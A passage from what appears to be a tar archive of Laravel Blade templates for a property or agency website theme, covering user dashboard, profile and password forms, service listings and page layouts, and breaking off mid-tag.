ground-single-list"> <a href="#"> <div class="btn-circle-40 theme-cl theme-bg-light"><i class="ti-heart"></i></div> </a> <div class="ground-content"> <h6><a href="#">Someone bookmark your View listing!<strong>Sargun Villa Bay</strong></a></h6> <span class="small">1 day ago</span> </div> </div> <div class="ground ground-single-list"> <a href="#"> <div class="btn-circle-40 theme-cl theme-bg-light"><i class="ti-home"></i></div> </a> <div class="ground-content"> <h6><a href="#">Your listing <strong>Modern Family Home</strong> has been approved!.</a></h6> <span class="small">10 days ago</span> </div> </div> <div class="ground ground-single-list"> <a href="#"> <div class="btn-circle-40 theme-cl theme-bg-light"><i class="ti-comment-alt"></i></div> </a> <div class="ground-content"> <h6><a href="#">Adam Brown left a review on <strong>Renovated Apartment</strong></a></h6> <span class="small">Just Now</span> </div> </div> </div> </div> </div> </div> <!-- row --> <div class="row"> <div class="col-lg-12 col-md-12"> <div class="card"> <div class="card-header"> <h4 class="mb-0">Order Status</h4> </div> <div class="card-body p-0"> <div class="table-responsive"> <table class="table table-lg table-hover"> <thead> <tr> <th>Name</th> <th>Product ID</th> <th>Status</th> <th>Price</th> <th>Date Created</th> </tr> </thead> <tbody> <tr> <td><a href="#"><img src="assets/img/p-1.png" class="avatar avatar-30 mr-2" alt="Avatar">Luxury House</a></td> <td>#258475</td> <td><div class="label text-success bg-success-light">Paid</div></td> <td>$ 310</td> <td>04/10/2013</td> </tr> <tr> <td><a href="#"><img src="assets/img/p-2.png" class="avatar avatar-30 mr-2" alt="Avatar">Sargun Apartment</a></td> <td>#249578</td> <td><div class="label text-warning bg-warning-light">Pending</div></td> <td>$ 584.14</td> <td>05/08/2014</td> </tr> <tr> <td><a href="#"><img src="assets/img/p-3.png" class="avatar avatar-30 mr-2" alt="Avatar">Preet Silver City</a></td> <td>#248712</td> <td><div class="label text-danger bg-danger-light">Cancel</div></td> <td>$ 710.5</td> <td>11/05/2015</td> </tr> <tr> <td><a href="#"><img src="assets/img/p-4.png" class="avatar avatar-30 mr-2" alt="Avatar">Mount See Villa</a></td> <td>#287246</td> <td><div class="label text-success bg-success-light">Paid</div></td> <td>$ 482.70</td> <td>06/09/2016</td> </tr> </tbody> </table> </div> </div> </div> </div> </div> <!-- row --> </div> </div> </div> </div> </section> <!-- ============================ User Dashboard End ================================== --> @endsection ��������������������������������������������������������views/frontend/profile/change-password.blade.php����������������������������������������������������0000644�����������������00000014333�14765366572�0016055 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.frontend.master') @section('content') <!-- ============================ Page Title Start================================== --> <div class="page-title" style="background:#f4f4f4 @if (isset($breadcrumb)) url({{ asset('uploads/img/general/'.$breadcrumb->breadcrumb_image) }}); @else url({{ asset('uploads/img/dummy/1920x750.jpg') }}); @endif" data-overlay="5"> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12"> <div class="breadcrumbs-wrap"> <ol class="breadcrumb"> <li class="breadcrumb-item active" aria-current="page">My Profile</li> </ol> <h2 class="breadcrumb-title">Change Password</h2> </div> </div> </div> </div> </div> <!-- ============================ Page Title End ================================== --> <!-- ============================ User Dashboard ================================== --> <section class="gray pt-5 pb-5"> <div class="container-fluid"> <div class="row"> <div class="col-lg-3 col-md-4 col-sm-12"> <div class="property_dashboard_navbar"> <div class="dash_user_avater"> @if (!empty($user->profile_photo_path)) <img src="{{ asset('uploads/img/profile/'.$user->profile_photo_path) }}" class="img-fluid avater" alt="profile image"> @else <img src="{{ asset('uploads/img/dummy/100x100.jpg') }}" class="img-fluid avater" alt="profile image"> @endif <h4>{{ Auth::user()->name }}</h4> </div> <div class="dash_user_menues"> <ul> <li><a href="dashboard.html"><i class="fa fa-tachometer-alt"></i>Dashboard<span class="notti_coun style-1">4</span></a></li> <li><a href="{{ route('profile-page.edit') }}"><i class="fa fa-user-tie"></i>My Profile</a></li> <li><a href="bookmark-list.html"><i class="fa fa-bookmark"></i>Saved Property<span class="notti_coun style-2">7</span></a></li> <li><a href="my-property.html"><i class="fa fa-tasks"></i>My Properties</a></li> <li><a href="messages.html"><i class="fa fa-envelope"></i>Messages<span class="notti_coun style-3">3</span></a></li> <li><a href="choose-package.html"><i class="fa fa-gift"></i>Choose Package<span class="expiration">10 days left</span></a></li> <li><a href="submit-property-dashboard.html"><i class="fa fa-pen-nib"></i>Submit New Property</a></li> <li class="active"><a href="{{ route('profile-page.change_password_edit') }}"><i class="fa fa-unlock-alt"></i>Change Password</a></li> </ul> </div> <div class="dash_user_footer"> <ul> <li><a href="#"><i class="fa fa-power-off"></i></a></li> <li><a href="#"><i class="fa fa-comment"></i></a></li> <li><a href="#"><i class="fa fa-cog"></i></a></li> </ul> </div> </div> </div> <div class="col-lg-9 col-md-8 col-sm-12"> <div class="dashboard-body"> <div class="dashboard-wraper"> <!-- Basic Information --> <div class="frm_submit_block"> <h4>My Profile</h4> <div class="frm_submit_wrap"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="form-row" action="{{ route('profile-page.change_password_update') }}" method="POST"> @method('PUT') @csrf @endif <div class="form-group col-md-12"> <label>Password</label> <input type="password" class="form-control" name="current_password" placeholder="Enter Current Password *" required> </div> <div class="form-group col-md-12"> <label>New Password</label> <input type="password" class="form-control" name="password" placeholder="Enter New password *" required> </div> <div class="form-group col-md-12"> <label>Confirm Password</label> <input type="password" class="form-control" name="password_confirmation" placeholder="Enter Confirm password *" required> </div> <div class="form-group col-lg-12 col-md-12 mt-4"> <button class="btn btn-theme btn-lg" type="submit">Save Changes</button> </div> </form> </div> </div> </div> </div> </div> </div> </div> </section> <!-- ============================ User Dashboard End ================================== --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/profile/edit.blade.php���������������������������������������������������������������0000644�����������������00000015641�14765366572�0013720 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.frontend.master') @section('content') <!-- ============================ Page Title Start================================== --> <div class="page-title" style="background:#f4f4f4 @if (isset($breadcrumb)) url({{ asset('uploads/img/general/'.$breadcrumb->breadcrumb_image) }}); @else url({{ asset('uploads/img/dummy/1920x750.jpg') }}); @endif" data-overlay="5"> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12"> <div class="breadcrumbs-wrap"> <ol class="breadcrumb"> <li class="breadcrumb-item active" aria-current="page">My Profile</li> </ol> <h2 class="breadcrumb-title">My Account & Profile</h2> </div> </div> </div> </div> </div> <!-- ============================ Page Title End ================================== --> <!-- ============================ User Dashboard ================================== --> <section class="gray pt-5 pb-5"> <div class="container-fluid"> <div class="row"> <div class="col-lg-3 col-md-4 col-sm-12"> <div class="property_dashboard_navbar"> <div class="dash_user_avater"> @if (!empty($user->profile_photo_path)) <img src="{{ asset('uploads/img/profile/'.$user->profile_photo_path) }}" class="img-fluid avater" alt="profile image"> @else <img src="{{ asset('uploads/img/dummy/100x100.jpg') }}" class="img-fluid avater" alt="profile image"> @endif <h4>{{ Auth::user()->name }}</h4> </div> <div class="dash_user_menues"> <ul> <li><a href="dashboard.html"><i class="fa fa-tachometer-alt"></i>Dashboard<span class="notti_coun style-1">4</span></a></li> <li class="active"><a href="{{ route('profile-page.edit') }}"><i class="fa fa-user-tie"></i>My Profile</a></li> <li><a href="bookmark-list.html"><i class="fa fa-bookmark"></i>Saved Property<span class="notti_coun style-2">7</span></a></li> <li><a href="my-property.html"><i class="fa fa-tasks"></i>My Properties</a></li> <li><a href="messages.html"><i class="fa fa-envelope"></i>Messages<span class="notti_coun style-3">3</span></a></li> <li><a href="choose-package.html"><i class="fa fa-gift"></i>Choose Package<span class="expiration">10 days left</span></a></li> <li><a href="submit-property-dashboard.html"><i class="fa fa-pen-nib"></i>Submit New Property</a></li> <li><a href="{{ route('profile-page.change_password_edit') }}"><i class="fa fa-unlock-alt"></i>Change Password</a></li> </ul> </div> <div class="dash_user_footer"> <ul> <li><a href="#"><i class="fa fa-power-off"></i></a></li> <li><a href="#"><i class="fa fa-comment"></i></a></li> <li><a href="#"><i class="fa fa-cog"></i></a></li> </ul> </div> </div> </div> <div class="col-lg-9 col-md-8 col-sm-12"> <div class="dashboard-body"> <div class="dashboard-wraper"> <!-- Basic Information --> <div class="frm_submit_block"> <h4>My Profile</h4> <div class="frm_submit_wrap"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="form-row" action="{{ route('profile-page.update', $user->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="form-group col-md-6"> <label>Your Name</label> <input type="text" class="form-control" name="name" placeholder="Enter Username *" value="{{ $user->name }}" required> </div> <div class="form-group col-md-6"> <label>Email</label> <input type="text" class="form-control" name="email" placeholder="Enter Email *" value="{{ $user->email }}" required> </div> <div class="form-group col-md-6"> <label for="image">{{ __('content.image') }} ({{ __('content.size') }} 100 x 100)(.png, .jpg, .jpeg)</label> <input id="image" name="profile_photo_path" type="file" class="form-control-file"> @if (!empty($user->profile_photo_path)) <img src="{{ asset('uploads/img/profile/'.$user->profile_photo_path) }}" class="img-fluid mt-3" alt="profile image"> @else <img src="{{ asset('uploads/img/dummy/100x100.jpg') }}" class="img-fluid mt-3" alt="profile image"> @endif </div> <div class="form-group col-lg-12 col-md-12 mt-4"> <button class="btn btn-theme btn-lg" type="submit">Save Changes</button> </div> </form> </div> </div> </div> </div> </div> </div> </div> </section> <!-- ============================ User Dashboard End ================================== --> @endsection �����������������������������������������������������������������������������������������������views/frontend/service/category-index-list.blade.php������������������������������������������������0000644�����������������00000044037�14765366572�0016667 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('service check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Services Section Start //--> <section class="section pb-minus-70"> <div class="container"> @if(Auth::user()) @can('service check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-12"> @if (is_countable($service_count_categories) && count($service_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($service_index->page_uri) }}" class="mb-2">{{ __('frontend.all_services') }}</a> @foreach ($service_count_categories as $service_count_category) @if (isset($service_count_category->service_category->service_category_slug)) <a class="@if ($category->category_name == $service_count_category->service_category->category_name) current @endif mb-2" href="{{ route('default-service-category-index', $service_count_category->service_category->service_category_slug) }}">{{$service_count_category->service_category->category_name }} ({{ $service_count_category->category_count }})</a> @endif @endforeach @unset ($service_count_category) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Creative</a> <a href="#" class="link-secondary">Business</a> <a href="#" class="link-secondary">UI / UX Design</a> <a href="#" class="link-secondary">Marketing</a> </div> @endif @endif </div> </div> @if (is_countable($services_paginate_style) && count($services_paginate_style) > 0) <div class="row"> @foreach ($services_paginate_style as $item) <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.{{ $loop->iteration }}s"> @if(Auth::user()) @can('service check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="services-item"> @if (!empty($item->section_image_2)) <img src="{{ asset('uploads/img/service/'.$item->section_image_2) }}" alt="Services image" class="services-bg-img"> @endif <div class="body"> <h4>0{{$loop->index + 1 }}</h4> <h5>{{ $item->title }}</h5> <p>{{ $item->short_description }}</p> @if (!empty($item->button_name)) <div class="btn-box"> <a href="{{ $item->button_url }}">{{ $item->button_name }} <i class="fa fa-arrow-right"></i></a> </div> @else <div class="btn-box"> <a href="{{ route('default-service-detail-show', ['service_slug' => $item->service_slug]) }}">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i></a> </div> @endif </div> @if ($item->type == 'icon') @if (!empty($item->icon)) <div class="icon"> <span class="{{ $item->icon }}"></span> </div> <div class="icon-border"></div> @endif @else @if (!empty($item->section_image)) <div class="icon"> <img src="{{ asset('uploads/img/service/'.$item->section_image) }}" alt="service icon"> </div> @endif @endif </div> </div> @endforeach @unset ($item) </div> <div class="row"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $services_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>01</h4> <h5>Web Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-tablet"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>02</h4> <h5>Graphic Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-adjust"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInRight" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>03</h4> <h5>UI/UX Design</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fab fa-uikit"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInLeft" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>04</h4> <h5>Content Writing</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-blog"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>05</h4> <h5>Scripts & Plugin</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-code"></span> </div> <div class="icon-border"></div> </div> </div> <div class="col-lg-4 col-md-6 wow fadeInRight" data-wow-duration="0.5s" data-wow-delay="0.1s"> <div class="services-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Services image" class="services-bg-img"> <div class="body"> <h4>06</h4> <h5>Digital Marketing</h5> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <a href="#">Read More <i class="fa fa-arrow-right"></i></a> </div> <div class="icon"> <span class="fa fa-bullhorn"></span> </div> <div class="icon-border"></div> </div> </div> </div> @endif @endif </div> </section> <!--// Services Section End //--> @if(Auth::user()) @can('service check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }}</button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="service.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-plus text-white"></i> {{ __('content.add_service') }}</button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/service/category-index.blade.php�����������������������������������������������������0000644�����������������00000024340�14765366572�0015711 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar"> <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.service.category-index-list') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/service/show.blade.php���������������������������������������������������������������0000644�����������������00000025004�14765366572�0013745 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($service->title)) {{ $service->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($service_content->meta_description)) {{ $service_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($service_content->meta_keyword)) {{ $service_content->meta_keyword }} @elseif (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($service->title)) {{ $service->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($service_content->meta_description)) {{ $service_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($service->title)) {{ $service->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($service_content->meta_description)) {{ $service_content->meta_description }} @elseif (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($service->title)) {{ $service->title }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link 